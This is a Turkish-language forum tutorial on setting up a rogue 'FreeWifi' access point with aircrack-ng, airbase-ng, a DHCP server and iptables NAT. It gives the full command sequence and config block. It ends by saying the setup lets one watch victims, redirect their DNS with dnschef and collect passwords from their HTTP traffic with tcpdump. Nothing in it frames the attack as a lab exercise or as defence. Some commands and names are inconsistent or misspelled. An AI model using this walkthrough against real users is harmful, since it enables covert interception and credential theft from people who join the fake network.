- 1 Ara 2018
- 880
- 48
![NZr505.png](https://i.hizliresim.com/NZr505.png)
Aircrack-ng Nedir?
Aircrack-ng, bir paket dinleyici veya WEP ve WPA/WPA2 şifrelerini kıran bir dedektör diyebiliriz. Aircrack aracını kullanırken bazı öğrenmemiz gereken komutlar var. Bunlar;
"airodump-ng" , "aireplay-ng" , "aircrack-ng" ve "airdecap-ng" bugün ki konumuzda göreceğimiz komutlar.
![NZr505.png](https://i.hizliresim.com/NZr505.png)
Aircrack ile Sahte Kablosuz Ağ Oluşturma
Terminalimizi açıp ilk komudumuz ile başlayalım.
Kod:
ifconfig
![Ekran-Alintisi1.jpg](https://resmin.net/images/2020/11/03/Ekran-Alintisi1.jpg)
![NZr505.png](https://i.hizliresim.com/NZr505.png)
WLAN14 Bizim ağ adaptörümüz demektir.
Şimdi sahte erişim noktası için ağ adaptörümüzü kullanalım ve airmon-ng aracımız ile sanal bir arayüz oluşturalım ve bağlantımızı başlatalım.
![NZr505.png](https://i.hizliresim.com/NZr505.png)
Kod:
airmon-ng start wlan14
![Ekran-Alintisi2.jpg](https://resmin.net/images/2020/11/03/Ekran-Alintisi2.jpg)
Artık dinleme yapmayı veya sahte erişim noktası yapabilmek için ağ adaptörümüzu kullanabilirsiniz,
airmon-ng aracıyla sanal bir arayüz oluşturup ilgili bağlantımızı başlatalım,
mon1 adında bir arayüz oluştu test edelim bakalım etrafdaki kablosuz ağlarımız gözüküyor mu, Fakat onu yapmadan hata vermemesi için şu komutu yazalım,
![NZr505.png](https://i.hizliresim.com/NZr505.png)
Kod:
modprobe r8187se
![Ekran-Alintisi3.jpg](https://resmin.net/images/2020/11/03/Ekran-Alintisi3.jpg)
Ardından mon1 arayüzümüzü test edelim,
![NZr505.png](https://i.hizliresim.com/NZr505.png)
Kod:
airodum-ng mon1
![Ekran-Alintisi4.jpg](https://resmin.net/images/2020/11/03/Ekran-Alintisi4.jpg)
Bu ağa bağlanıcak kişilere ip verebilmek adına DHCP sunucumuzu kuruyoruz
![NZr505.png](https://i.hizliresim.com/NZr505.png)
Kod:
apt-get install dhcp3-server
![Ekran-Alintisi5.jpg](https://resmin.net/images/2020/11/03/Ekran-Alintisi5.jpg)
Yüklenmezse manuel bir şekilde indirmek için bu dosyayı indirin http://oemsources.volumio.org/brystonair/1.365/isc-dhcp-server.tar.gz
Ardından bu komudu yazalım
![NZr505.png](https://i.hizliresim.com/NZr505.png)
Kod:
tar -xvf isc-dhcp-server.tar.gz -C /test
![Ekran-Alintisi6.jpg](https://resmin.net/images/2020/11/03/Ekran-Alintisi6.jpg)
.dep paketimiz yüklendikten sonra sistemi sonra yeniden başlatalım.
![NZr505.png](https://i.hizliresim.com/NZr505.png)
Kod:
dpkg -i isc.dhcp.server.dep
![Ekran-Alintisi7.jpg](https://resmin.net/images/2020/11/03/Ekran-Alintisi7.jpg)
![NZr505.png](https://i.hizliresim.com/NZr505.png)
Kod:
reboot
![Ekran-Alintisi8.jpg](https://resmin.net/images/2020/11/03/Ekran-Alintisi8.jpg)
Sonra IP aralığını verebilmek için dhcp servisimizin conf dosyasını düzenleyelim
![NZr505.png](https://i.hizliresim.com/NZr505.png)
Kod:
nano /etc/dhcp3/dhcpd.conf
![Ekran-Alintisi9.jpg](https://resmin.net/images/2020/11/03/Ekran-Alintisi9.jpg)
ve direkt bu kısmı copy-paste yapın.
ddns-update-style ad-hoc; //bu alanı daha sonradan servis çalışmassa hata verirse kaldıracağız.
default-lease-time 600;
max-lease-time 7200;
authoritative;
subnet 10.0.0.0 netmask 255.255.255.0 {
option subnet-mask 255.255.255.0;
option broadcast-address 10.0.0.255;
option routers 10.0.0.254;
option domain-name-servers 8.8.8.8;
range 10.0.0.1 10.0.0.140;
}
![NZr505.png](https://i.hizliresim.com/NZr505.png)
Ardından airbase-ng komuduyla kablosuz ağı oluşturalım.
Kod:
airbase-ng -e FreeWifi -c 11 -v wlan1 &
![Ekran-Alintisi10.jpg](https://resmin.net/images/2020/11/03/Ekran-Alintisi10.jpg)
![NZr505.png](https://i.hizliresim.com/NZr505.png)
at0 isimli bir sanal arabirimi indirelim,
Kod:
ifconfig at0 up
![Ekran-Alintisi11.jpg](https://resmin.net/images/2020/11/03/Ekran-Alintisi11.jpg)
Kod:
ifconfig at0 10.0.0.254 netmask 255.255.255.0
![NZr505.png](https://i.hizliresim.com/NZr505.png)
route komutunu yazalım,
Kod:
route add -net 10.0.0.0 netmask 255.255.255.0 gw 10.0.0.254
![Ekran-Alintisi12.jpg](https://resmin.net/images/2020/11/03/Ekran-Alintisi12.jpg)
![NZr505.png](https://i.hizliresim.com/NZr505.png)
iptable ayarlarımızı yapalım,
Kod:
iptables --flush
![Ekran-Alintisi13.jpg](https://resmin.net/images/2020/11/03/Ekran-Alintisi13.jpg)
Kod:
iptables --table nat --flush
![Ekran-Alintisi14.jpg](https://resmin.net/images/2020/11/03/Ekran-Alintisi14.jpg)
Kod:
iptables --delete-chain
![Ekran-Alintisi15.jpg](https://resmin.net/images/2020/11/03/Ekran-Alintisi15.jpg)
![NZr505.png](https://i.hizliresim.com/NZr505.png)
Kod:
iptables -P FORWARD ACCEPT
![Ekran-Alintisi16.jpg](https://resmin.net/images/2020/11/03/Ekran-Alintisi16.jpg)
Kod:
iptables -t nat -A POSTROUTING -o eth0 -j MASQUERADE
![Ekran-Alintisi17.jpg](https://resmin.net/images/2020/11/03/Ekran-Alintisi17.jpg)
![NZr505.png](https://i.hizliresim.com/NZr505.png)
DHCP serverimizi başlatalım,
Kod:
dhcpd -d -f -cf /etc/dhcp3/dhcpd.conf at0 &
![Ekran-Alintisi18.jpg](https://resmin.net/images/2020/11/03/Ekran-Alintisi18.jpg)
![NZr505.png](https://i.hizliresim.com/NZr505.png)
geçiş yapacak IP'lerimizi yönlendirelim.
Kod:
echo "1" > /proc/sys/net/ipv4/ip_forward
![Ekran-Alintisi19.jpg](https://resmin.net/images/2020/11/03/Ekran-Alintisi19.jpg)
Bu adımlara kadar geldikten sonra ilgili testleri yapın. Bu sayede bir kullanıcının IP'sini alıp onu izleyebilirsiniz dnschef ile dns yönlendirmesi yaparak ve tcpdump ile de http trafiğinde parola bilgilerini alabiliriz.
![NZr505.png](https://i.hizliresim.com/NZr505.png)
Son düzenleme: